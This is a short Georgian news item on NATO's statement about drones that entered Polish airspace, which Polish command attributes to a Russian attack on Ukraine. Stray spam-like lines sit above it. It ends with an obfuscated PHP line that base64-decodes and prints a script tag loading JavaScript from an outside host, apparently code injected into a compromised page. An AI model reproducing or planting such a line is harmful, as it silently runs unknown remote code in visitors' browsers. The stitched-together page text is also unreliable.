global distribution
გარე ავეჯი

პოლონეთის საჰაერო სივრცეში შეჭრილ დრონებს პოლონეთისა და ნატო-ს საჰაერო თავდაცვის ძალები დახვდნენ, – ამის შესახებ ნატო-ს პრესსპიკერი, ელისონ ჰართი სოციალურ ქსელში წერს.

მისივე თქმით, ნატო მჭიდრო კონსულტაციებს აწარმოებს პოლონეთთან.

„მრავალი დრონი შეიჭრა პოლონეთის საჰაერო სივრცეში ღამის განმავლობაში და მათ პოლონეთის და ნატო-ს საჰაერო თავდაცვის ძალები დახვდნენ. ნატო-ს გენერალური მდივანი კავშირზეა პოლონეთის ხელმძღვანელობასთან და ნატო მჭიდრო კონსულტაციებს აწარმოებს პოლონეთთან“, – წერს ელისონ ჰართი.

პოლონეთის ძალებმა ოფიციალურად დაასრულეს სამხედრო ოპერაცია. მათ ღამის განმავლობაში პოლონეთის საჰაერო სივრცეში შეჭრილი დრონები ჩამოაგდეს. მანამდე, პოლონეთის შეიარაღებულ ძალებში ქვეყნის საჰაერო სივრცის უპრეცედენტო დარღვევაზე განაცხადეს. პოლონეთის არმიის ოპერაციული სარდლობის განცხადებაში ნათქვამია, რომ „რუსეთის ფედერაციის მიერ უკრაინის ტერიტორიაზე თავდასხმის შედეგად მოხდა პოლონეთის საჰაერო სივრცის უპრეცედენტო დარღვევა დრონის ტიპის ობიექტებით“.

103
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");